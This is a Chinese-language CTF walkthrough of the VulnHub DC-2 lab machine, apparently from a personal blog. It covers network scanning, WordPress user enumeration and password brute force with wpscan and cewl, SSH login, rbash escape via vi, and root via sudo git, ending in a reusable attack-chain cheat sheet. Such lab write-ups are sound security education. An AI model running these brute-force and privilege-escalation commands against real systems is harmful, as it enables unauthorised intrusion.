DC-2

⚠️安全声明

本文档仅用于以下合法目的:

  • 网络安全教育与学术研究
  • 授权渗透测试与安全评估
  • CTF竞赛解题过程分享
  • 企业安全防护能力建设

重要提醒:

  • 文中涉及的技术仅可在自己拥有或获得明确授权的系统上使用
  • 未经授权对他人系统进行测试属于违法行为
  • 请遵守《网络安全法》及相关法律法规
  • 建议在隔离的实验室环境中实践这些技术

盐焗菜鸡自成长

靶机下载地址:https://download.vulnhub.com/dc/DC-2.zip

参考:【DC-2 渗透实战笔记】“今年的诺贝尔奖又没有我。” (qq.com)

靶机概述

DC-2 是一个中等难度的渗透测试靶机,主要考察 WordPress 安全、SSH 服务安全、rbash 逃逸和 sudo 权限提升等知识点。

信息搜集&&目录扫描

开启目标靶机,将网络设置成net
扫描局域网

sudo netdiscover

![image-20251015091027327](I:\01_渗透\02_笔记\DC-2.assets\image-20251015091027327.png)

得到目标靶机ip192.168.221.139

扫描开放端口

nmap -sV 192.168.221.139

![image-20251015091415250](I:\01_渗透\02_笔记\DC-2.assets\image-20251015091415250.png)

扫描技术栈

whatweb -v http://192.168.221.139/

发现网站重定向

![image-20251015092703593](I:\01_渗透\02_笔记\DC-2.assets\image-20251015092703593.png)

kali输入以下命令,修改hosts主机名解析

echo "192.168.221.139 dc-2" | sudo tee -a /etc/hosts

本机需要修改hosts文件

![image-20251015092414486](I:\01_渗透\02_笔记\DC-2.assets\image-20251015092414486.png)

对域名进行技术栈扫描

whatweb -v http://dc-2/

![image-20251015092830006](I:\01_渗透\02_笔记\DC-2.assets\image-20251015092830006.png)

  • CMS: WordPress 4.7.10
  • Web服务器: Apache 2.4.10
  • 操作系统: Debian Linux
  • 前端技术: HTML5 + jQuery 1.12.4

同时我们登上网站Flag – DC-2,获得FLAG1

![image-20251015093125020](I:\01_渗透\02_笔记\DC-2.assets\image-20251015093125020.png)

暴力破解&&登录网站

询问AI
![image-20251015093248973](I:\01_渗透\02_笔记\DC-2.assets\image-20251015093248973.png)

得知这次渗透方向,我们可以用wpscan cewl 等等一系列针对WordPress的工具来攻击

枚举WordPress用户

wpscan --url http://dc-2/ --enumerate u

![image-20251015093637593](I:\01_渗透\02_笔记\DC-2.assets\image-20251015093637593.png)

找到三个用户adminjerrytom

生成密码字典

sudo cewl http://dc-2/ -w dc2_passwords.txt

![image-20251015093900029](I:\01_渗透\02_笔记\DC-2.assets\image-20251015093900029.png)

密码暴力攻击

wpscan --url http://dc-2/ --usernames jerry,tom,admin --passwords dc2_passwords.txt

![image-20251015094148275](I:\01_渗透\02_笔记\DC-2.assets\image-20251015094148275.png)

找到账号密码

  • jerry / adipiscing
  • tom / parturient

访问http://dc-2/wp-admin 登录后台

在jerry后台发现FLAG2

![image-20251015094610528](I:\01_渗透\02_笔记\DC-2.assets\image-20251015094610528.png)

全端口扫描&&ssh登录

询问AI

![image-20251015094801137](I:\01_渗透\02_笔记\DC-2.assets\image-20251015094801137.png)

尝试nmap全端口扫描

nmap -sS -sV -p- 192.168.221.139

![image-20251015095109345](I:\01_渗透\02_笔记\DC-2.assets\image-20251015095109345.png)

发现有新的端口 ssh 7744

尝试用不同的账号密码来登录ssh

ssh jerry@192.168.221.139 -p 7744
# 密码: adipiscing
ssh tom@192.168.221.139 -p 7744
# 密码: parturient

![image-20251015095332985](I:\01_渗透\02_笔记\DC-2.assets\image-20251015095332985.png)

tom登录成功

目录下有FLAG3

但是我们用cat命令打不开,AI说是受到rbash的限制,我们可以使用其他的读取命令

![image-20251015095853899](I:\01_渗透\02_笔记\DC-2.assets\image-20251015095853899.png)

使用less

less flag3.txt

![image-20251015100102147](I:\01_渗透\02_笔记\DC-2.assets\image-20251015100102147.png)

后来发现vi也在,可以用vi打开

vi flag3.txt

rbash逃逸&&su登录

询问AI

![image-20251015100214135](I:\01_渗透\02_笔记\DC-2.assets\image-20251015100214135.png)

rbash有限制
![image-20251015105914841](I:\01_渗透\02_笔记\DC-2.assets\image-20251015105914841.png)

查看系统环境路径

echo $PATH

查看可以使用的命令

 ls -la /home/tom/usr/bin

![image-20251015110107981](I:\01_渗透\02_笔记\DC-2.assets\image-20251015110107981.png)

发现vi编辑器可用,接下来使用vi逃逸rbash

# 在 tom 的 SSH 会话中启动vi
vi
# 在 vi 编辑器中,输入(先输入冒号):
:set shell=/bin/bash
:shell

成功逃逸到bash

![image-20251015110424260](I:\01_渗透\02_笔记\DC-2.assets\image-20251015110424260.png)

查看su在哪

ls -la /bin/su /usr/bin/su 2>/dev/null

![image-20251015102448528](I:\01_渗透\02_笔记\DC-2.assets\image-20251015102448528.png)

直接使用su的完整路径

/bin/su jerry
# 密码:adipiscing

转到jerry的目录

cd /home/jerry

打开FLAG4

vi flag4.txt

![image-20251015103517691](I:\01_渗透\02_笔记\DC-2.assets\image-20251015103517691.png)

git提权

询问AI

![image-20251015103730935](I:\01_渗透\02_笔记\DC-2.assets\image-20251015103730935.png)

查询权限

sudo -i

![image-20251015103755019](I:\01_渗透\02_笔记\DC-2.assets\image-20251015103755019.png)

发现jerry可以以root权限无密码执行git命令,结合FLAG4提示,攻击方向定为git

git提权

sudo git -p help config
# 在分页器中(冒号后),输入:
!/bin/bash

得到root权限

![image-20251015104201226](I:\01_渗透\02_笔记\DC-2.assets\image-20251015104201226.png)

getfinalFLAG

vi /root/final-flag.txt

![image-20251015104312802](I:\01_渗透\02_笔记\DC-2.assets\image-20251015104312802.png)

总结

这次安全渗透测试与第一次不同,从WordPress这款个人博客网站入手,收集账号和密码,循环遍历登录网站,然后用nmap全端口扫描,ssh登录,在rbashvi逃逸,在bash没有设置/bin系统环境下使用su,切换jerry账号,sudo -i查询权限,git提权。

攻击链梳理

1.信息收集 → 2. WordPress 攻击 → 3. SSH 登录 → 4. rbash 逃逸 → 5. 横向移动 → 6. 权限提升

  1. 扫描局域网

    nmap -sV [目标ip]

  1. 扫描技术栈

    whatweb -v http://[目标ip]/

  1. 修改hosts主机名解析

    echo "[目标ip] [域名]" | sudo tee -a /etc/hosts

  1. wpScan枚举WordPress用户

    wpscan --url http://[域名]/ --enumerate u

  1. cewl搜集网站密码

    sudo cewl http://[域名]/ -w dc2_passwords.txt

  1. wpScan爆破密码

    wpscan --url http://[域名]/ --usernames jerry,tom,admin --passwords dc2_passwords.txt

  1. nmap全端口扫描

    nmap -sS -sV -p- [目标ip]

  1. ssh登录

    ssh tom@192.168.221.139 -p 7744
# 密码: parturient (非显示型输入)

  1. rbash环境下 vi逃逸

    vi
# 在 vi 编辑器中,输入(先输入冒号):
:set shell=/bin/bash
:shell

  1. su 切换用户

    /bin/su jerry
# 密码:adipiscing

  1. git提权

    sudo git -p help config
# 在分页器中(冒号后),输入:
!/bin/bash

    GetShell!

最后修改:2025 年 10 月 15 日
© 允许规范转载
很强的定力